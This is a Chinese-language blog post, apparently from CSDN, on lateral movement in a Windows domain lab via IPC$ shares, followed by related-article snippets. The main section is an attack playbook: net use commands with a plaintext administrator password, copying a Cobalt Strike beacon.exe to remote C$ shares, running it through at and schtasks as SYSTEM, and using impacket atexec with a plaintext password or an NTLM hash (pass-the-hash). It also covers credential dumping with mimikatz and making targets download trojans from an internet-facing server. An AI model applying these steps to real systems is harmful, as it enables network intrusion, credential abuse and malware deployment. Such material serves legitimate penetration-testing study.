内网渗透之横向移动ipc

已于 2023-04-21 18:41:24 修改
阅读量769 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 服务器 windows 网络安全
于 2023-04-21 17:27:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130286278
版权

0x00 内网横向移动介绍

内网横向移动是什么
在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器

信息搜集
需要收集用户 网络 凭据等信息

net time /domain    判断是否有域
net user/domain    判断域内用户
ping OWA2010CN-God.god.org 判断dc  ip
nslookup OWA2010CN-God.god.org

网络(存活主机货端口)
nmap或cs内的插件等工具
cs扫描后存活主机会在视图 -目录列表中显示
在这里插入图片描述凭据
mimikatz或cs内的插件等工具
使用cs抓取时会在视图 -密码凭证中显示,可以抓取明文密码也可以抓取hash,必须是这台电脑有的密码(登录过或设置过)
在这里插入图片描述

IPC是专用管道,可以实现对远程计算机的访问,需要使用目标系统用户的账号密码,使用139、445端口
IPC利用步骤:
1.建立ipc连接到目标主机
2.拷贝木马到目标主机
3.建立计划任务(at、schtasks)执行木马
4.删除ipc及计划任务

建立ipc连接的命令

net use \\server\ipc$ "password" /user:username                 # 工作组
net use \\server\ipc$ "password" /user:domain\username    #域内
dir \\xx.xx.xx.xx\C$\                             # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat        # 下载文件
copy 1.bat \\xx.xx.xx.xx\C$                 # 复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del      # 删除IPC
net view xx.xx.xx.xx                            # `在这里插入代码片`查看对方共享

复现环境:
god.org 域

0x01横向移动ipc命令

注意在cs中建立ipc连接时需要在前面加shell
win<win2012 at

net use \\192.168.3.21\ipc$ "Admin12345"/user:god.org\administrator # 建立ipc连接
copy beacon.exe \\192.168.3.21\c$  #拷贝执行文件到目标机器
at \\192.168.3.21 14:32  c:\beacon.exe   #添加计划任务

win>=win2012 schtasks

net use \\192.168.3.32\ipc$ "Admin12345" /user:god.org\administrator # 建立ipc连接
copy beacon.exe \\192.168.3.32\c$  #复制文件到其C盘
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn artfiact /sc DAILY /tr c:\artfiact.exe /F #创beacon任务对应执行文件
schtasks /run /s 192.168.3.32 /tn artfiact /i #运行beacon任务
schtasks /delete /s 192.168.3.21 /tn beacon /f#删除beacon任务

cs上线:
不能直接和cs服务端直接通信
1.正向连接
生成正向木马,直接连接
新建监听器 beacon_tcp(正向)
生成木马(后门类型 stageless),执行木马

connect  192.168.3.21 4444

2.反向连接
代理转发-转发上线
新建一个监听器,利用这个监听器上线
在这里插入图片描述
生成木马绑定这个监听器(后门是stageless),执行木马

在这里插入图片描述

0x02内网横向移动ipc cs插件

在这里插入图片描述

0x03内网横向移动ipc impacket套件 atexec

1.py版本
python需要先安装impacket库
cs开启socks代理
使用全局代理工具proxyfilter
新建代理服务器,连的是cs服务器的ip
设置代理服务规则
明文

本地用户
python atexec.py god/administrator:Admin12345@192.168.3.21 "whoami"
域内用户
python atexec.py ./administrator:Admin12345@192.168.3.21 "whoami"

hash值

python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"

在这里插入图片描述
在这里插入图片描述

2.exe版本(cs中使用,不推荐,文件较大)
明文

本地用户
shell atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami"
域内用户
shell atexec.exe god/administrator:Admin12345@192.168.3.21 "whomai"

hash

shell atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"

在这里插入图片描述
可能会出现smbsessionerror,注意输入的密码是否正确
在这里插入图片描述
这里可以利用此工具让目标主机远程下载木马上线,需要把木马放到能出网的web服务器上
cs是不用添加路由,和msf不一样,默认就已经添加了

mushangqiujin
关注
专栏目录
内网渗透(三十四)之横向移动篇-IPC配合计划任务横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-16 276
IPC( Internet ProcessConnection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算 机的共享资源时使用。通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。首先,需要建立一个ipc$
内网渗透-内网横向移动的九种方式
lza20001103的博客
08-26 1893
内网横向移动的九种方式 文章目录内网横向移动的九种方式实验环境1.IPC横向1.1 利用条件1.2 命令2.WMI横向2.1利用条件2.2wmic2.3 cscript2.4 wmiexec3.smb横向3.1 利用条件3.2 psexec(微软官方工具)3.3 psexec(impacket工具)3.4 smbexec4.密码喷洒4.1利用metasploit进行密码喷洒5.PTH-哈希传递5.1 利用条件5.2 MiMiKatz-PTH6.PTK-mimiKatZ761 利用条件7.PtT-票据传递(m
内网渗透_IPC
qq_42383069的博客
04-07 5279
内网渗透_IPC 0x01. 什么是IPC IPC(共享命名管道资源)其实就是为了实现进程间通信而开放的命名管道;IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源使用 简单理解:可以访问目标机器上的文件(上传、下载),也可以在目标标机器上运行命令 上传和下载文件直接通过 copy 命令就可以,不过路径缓存 UNC 路径 什么是UNC路径?就是以 \ 开头的路径就是UNC路径,比如:\\10.10.10.10\c$\users 0x02. IPC的利用条件 开启了1
简单的内网横向移动
最新发布
m0_74326506的博客
07-23 1067
内网中,通过网站漏洞打进一台机器,进行存货扫描,扫到不同网段的机器,然后经过代理打进不同网段的机器,这种叫纵向移动,如果扫到同网段的机器,而且这台机器除了正常端口开放外,没有安装其他任何服务,这可以经过横向移动,打进这台同网段的机器。sc命令可以用来注册删除查询系统服务,如果创建一个服务与木马绑定,则可以实现上线,但是一会就掉线,因为要和服务管理器进行通信,若是异常,明显这个创建的服务并不是正常的服务,所以服务管理器则会终止服务。创建成功,成功上线,删掉计划任务后,msf依旧不会掉线。
基于IPC$的横向移动
内心不种满鲜花就会长满杂草
11-12 3432
IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息,还能运行其他其他命令。 IPC$的利用条件 开启了139、445端口。IP
横向移动ipc$
weixin_48776804的博客
06-02 253
ipc$
内网安全:IPC协议横向移动
qq_61553520的博客
01-28 1993
本篇主要介绍内网横向移动IPC协议利用方式,从命令,工具,脚本自动化多种方式讲解实战攻击思路
红队内网攻防渗透:内网渗透内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
06-22
首先,横向移动内网渗透的关键步骤,是指攻击者在获取初步立足点后,如何在内网中悄无声息地扩大控制范围。这需要对网络拓扑、权限结构和安全策略有深入理解。在实施过程中,攻击者可能会利用弱密码、零日漏洞或...
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1394
内网环境下的横向移动总结
内网渗透-横向移动外部工具的使用
lza20001103的博客
10-01 2249
横向移动外部工具的使用 前言 文章目录横向移动外部工具的使用前言psexecSmbexecWmiexecmsf模块cs模块 psexec 首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话 在已获得的shell中输入 net use \192.168.52.141 /user:administrator “密码” (1)psexec https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec psexec使用 建立IPC连接,无需
内网渗透-【横向移动】PsExec工具远程命令执行横向移动
lza20001103的博客
09-02 1591
横向移动】PsExec工具远程命令执行横向移动 文章目录【横向移动】PsExec工具远程命令执行横向移动PsExec介绍 PsExec介绍 psexec 是 windows 下非常好的一款远程命令行工具。 psexec的使用不需要对方主机开方3389端口, 只需要对方开启admin共享和ipc共享和ipc共享和ipc (该共享默认开启,依赖于445端口)。 但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。 由于psexec是Windo
内网横向移动IPC
shy的博客
11-11 1977
一,IPC IPC(Internet Process Connection)共享命名管道的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限。 二,ipc$与空连接,139,445端口,默认共享的关系 1,ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口
[内网渗透]—IPC通道&计时任务
Sentiment的博客
12-08 543
IPC共享"命名管道"的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。通过IPC$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标计算机机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。
内网安全-横向移动IPC$连接--->计划任务--->上线
02-07 8872
横向移动-IPC$连接】at&schtasks创建定时任务上线
局域网共享 和 IPC$ 入侵问题
FISH 的专栏
11-24 3330
禁止ipc$默认共享的方法 以下四种方法可以参考一下: A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。 1,先把已有的删除 net share ipc$ /del net share admin$ /del net share c$ /del …………(有几个删几个) 2,禁止建立空连接  首先运行regedit,找到如下主键[HKEY_LOCAL_MACHIN
内网渗透初探 小白简单学习内网渗透_python写一个内网穿透
2401_84140302的博客
04-26 1061
以上便是我学习的简单地从外网获取shell,经过提权或不提权直接进行内网渗透的一个简单过程,其中涉及一些概念问题没有说的很明白,希望表哥们提点提点。以上仅为个人学习过程,可能知识点过于简单,望理解。
内网横向移动思路和技巧
热门推荐
11-30 2万+
攻击者借助跳板机进一步入侵内网服务器后,接着会通过各种方式来获取目标系统权限,获取用户的明文密码或Hash值在内网横向移动。最简单的方式,就是使用明文密码进行登录远程服务器。在这里,我...
内网渗透技术:横向移动学习笔记
"这篇内网横向移动学习备忘录主要探讨了在内网渗透测试中的横向移动技术,涉及网络环境的构建、攻击者的条件、利用方式以及相关的命令工具。作者通过一个具体的场景,即攻击者已经获得了Windows 7跳板机的权限,并且...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值